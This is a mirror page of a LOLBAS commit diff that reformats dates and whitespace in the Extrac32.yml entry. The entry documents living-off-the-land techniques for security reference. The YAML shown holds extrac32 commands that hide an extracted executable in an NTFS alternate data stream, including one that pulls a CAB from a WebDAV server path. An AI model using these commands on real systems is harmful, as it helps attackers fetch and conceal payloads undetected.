public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Standardise date formats (see https://yaml.org/type/timestamp.html)

Browse Source
This commit is contained in:
Wietze
2021-01-10 15:04:52 +00:00
parent de50a47957
commit 14dca38278
147 changed files with 407 additions and 407 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
yml/OSBinaries/Extrac32.yml
View File

@@ -1,12 +1,12 @@
---
Name: Extrac32.exe
Description:
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS
Privileges: User
MitreID: T1096
@@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS
Privileges: User
MitreID: T1096
@@ -39,10 +39,10 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe
Code_Sample:
Code_Sample:
- Code:
Detection:
- IOC:
- IOC:
Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f